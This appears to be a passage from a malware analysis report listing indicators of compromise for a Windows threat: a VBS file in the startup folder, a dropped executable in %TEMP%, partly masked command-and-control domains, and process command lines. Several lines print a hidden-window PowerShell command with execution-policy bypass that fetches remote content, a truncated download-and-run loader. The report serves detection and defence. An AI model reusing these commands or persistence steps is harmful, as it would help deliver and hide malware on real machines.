Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\u.vbs
- %TEMP%\s.exe
- <Full path to file>u.vbs
- 'mi#####ft.myiphost.com':1990
- '2.###4top.net':443
- DNS ASK 2.###4top.net
- DNS ASK mi#####ft.myiphost.com
- '%TEMP%\s.exe'
- '<SYSTEM32>\wscript.exe' "<Full path to file>u.vbs"
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('ht...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('ht...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://2.top4to...